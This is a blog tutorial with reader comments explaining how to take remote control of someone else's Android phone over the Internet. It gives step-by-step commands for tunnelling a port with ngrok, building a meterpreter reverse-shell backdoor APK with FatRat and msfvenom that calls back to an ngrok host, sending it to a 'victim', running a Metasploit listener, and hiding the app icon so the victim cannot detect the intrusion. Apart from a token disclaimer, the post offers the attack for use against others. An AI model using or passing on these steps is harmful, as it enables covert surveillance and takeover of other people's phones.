Hi guys, in this post, I’ll Explain to you that how can you Hack any Android phone on the Internet. This post is the part-2 of my earlier post in which I had explained to you that how to hack any android which is connected to the same network. But in this post, we will use the Port forwarding method. You can read more about the Port Forwarding hereIn this method, we will a tool which is known as ngrok and it will forward port to our localhost. By using this tutorial, you can easily gain access to any Android phone on the Internet

Note:- This post is only for educational purpous and we are not responsible for any illegal work done by you

Tools required in this tutorial

  • ngrok tool (Download here)
  • Fatrat tool (Download here)

Setup ngrok on Kali Linux

Step 1:- create a free account on Ngrok.com, basically, you can create an account on ngrok in different ways

  • using your personal Email
  • using Github

You can choose any way to signing up ngrok

Step 2:- Visit ngrok.com and click on Get started for free 

kali linux hack facebook

Step 3:- Now complete the Signup process by entering the valid details as

Step 4:- Click on the Linux option to download the executable file for your Kali Linux

kali linux hack facebook

Step 5:- Extract the ngrok file to Desktop of Your Kali Linux and then run the following command

./ngrok authtoken <Your auth token>
  • You can get your authtoken by here signing in by your ngrok user id and password

Step 6:- Once your authtoken  is verified then you can start Port Forwarding by using the following command

./ngrok tcp 1234

Step 7:-  A successful connection establishment will look like this

kali linux hack facebook

Now its time to create a Payload. To create a payload, I’ll use FatRat tool

How to setup FatRat in Kali Linux

Step 1:-  Download the Fatrat master from here

Step 2:- Extract the fatrat master to the Desktop and then your directory to the Fatrat folder by entering the following commands

cd Desktop
cd FatRat-master.zip

Step 3:- Now start the installation process by following command

./setup.sh

Note:- Its mandatory to have an active Internet connection during fatrat installation

How to create Payload using the fatrat

Step 1:- Open Terminal and type fatrat. click on continue and wait for fatrat to be started

Step 2:- Now select the first option, Create backdoor with msfvenom

kali linux hack facebook

Step 3:-  Now click on SIGN ANDROID to create a Payload for Android phone

Step 4:- Now it will ask you for LHOST IP, in this case, choose your LHOST IP from ngrok as(highlighted part is your LHOST IP)

kali linux hack facebook

  • in my case it is 0.tcp.ngrok.io

Step 5:- Next step is to enter the LPORT (LPORT is the no which is separated by: after LHOST IP)

Step 6:- Now it will ask for the name of the output file, keep it test

Step 7:- Now choose payload, select option 3 which is android/meterpreter/reverse_tcp and hit Enter

Step 8:- Now choose filename (anything you want) and hit enter

Step 9:- Now your payload will be created and will be located in the directory as shown

kali linux hack facebook

Note:- Now, Payload has been successfully created. Send this Payload via any medium you want like Email,Pendrive. It fully depends on you and its your work to send the Payload to the Victim's phone

Create Listener for the Injected Payload

It’s an essential Part  of this tutorial to create a listener to gain access to victim’s phone using Payload. To create listener, use the fatrat tool which we have already installed.

Step 1:- Open terminal and type fatrat

Step 2:- Select option no 10 which is Jump to msfconsole

Step 3:- Now type the following commands to create a listener

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit

Now as soon as the victim click on the installed app, a meterpreter session will be established.
kali linux hack facebook

ProTip:-

If the meterpreter session is established, then the first thing you have to do is to hide app icon from the launcher to be undetectable. By hiding icon from the launcher, you will be undetectable by the Victim. type the following command in terminal to hide the icon

hide_app_icon

–>> Feel free to ask any queries in the comment or visit Contact us. Suggestions are always welcomed.


Rajesh Ranjan

I'm a tech enthusiast currently pursuing B.Tech in Computer Science & Engineering. trying to make things as simple as possible

3 Comments

PRAKHAR GUPTA · May 10, 2019 at 10:43 AM

I wanna more post

karan jarawata · June 5, 2019 at 11:43 AM

when u were creating listener for injecting payload …….lhost u r using is ur real ip address or we need to use the ngrok lhost ip….?????

    Rajesh Ranjan · June 6, 2019 at 2:58 PM

    Hi karan, in the listener creation step, you have to put the IP of localhost, so that ngrok will deliver all the incoming traffic to our local machine. if you are still facing any problem, then join our telegram group here

Leave a Reply